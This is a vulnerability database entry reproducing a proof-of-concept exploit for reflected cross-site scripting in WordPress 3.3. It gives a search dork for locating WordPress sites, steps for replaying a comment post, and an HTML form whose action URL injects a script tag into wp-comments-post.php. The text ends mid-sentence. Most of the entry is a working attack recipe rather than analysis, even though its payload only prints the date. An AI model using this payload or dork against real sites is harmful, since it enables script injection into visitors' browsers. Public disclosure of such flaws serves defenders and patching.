Reflected Cross Site Scripting in wordpress 3.3

2012-01-03T00:00:00
ID SSV:30004
Type seebug
Reporter Root
Modified 2012-01-03T00:00:00

Description

No description provided by source.

                                        
                                            
                                                # Exploit Title: Reflected Cross Site Scripting in wordpress 3.3
# Google Dork: "Proudly powered by WordPress"
# Date: 2.1.2012
# Author: Aditya Modha, Samir Shah
# Software Link: http://www.wordpress.org/download/
# Version: 3.3
# Tested on: apache
# CVE :  Nope.


Step 1: Post a comment to the target website

Step 2: Replace the value of author tag, email tag, comment tag with the
exact value of what has been post in the last comment. Change the value of
comment_post_ID to the value of post (which can be known by opening that
post and checking the value of p parameter in the url). For example the if
the url is http://192.168.1.102/wordpress/?p=6 then the value of
comment_post_ID is 6.

<html>
<title>Wordpress 3.3 XSS PoC</title>

<body>

<form name="XSS" id="XSS" action="
http://192.168.1.102/wordpress/wp-comments-post.php?</style><script>document.write(Date())</script><style>"
method="POST">
<input type="hidden" name="author" value="replace me">
<input type="hidden" name="email" value="replace me">
<input type="hidden" name="url" value="">
<input type="hidden" name="comment" value="replace me">
<input type="hidden" name="submit" value="Post Comment">
<input type="hidden" name="comment_post_ID" value="replace me">
<input type="hidden" name="comment_parent" value="0">
<input type="button" value="Click Me" />
</form>

</body>
</html>

Step 3: Publish the above html file on the web server and access it. Click
on "Click Me" button. This will try to post the comment to wordpress which
will flag this comment as duplicate comment with the 500 Internal server
error response. Here our XSS payload will get executed. Check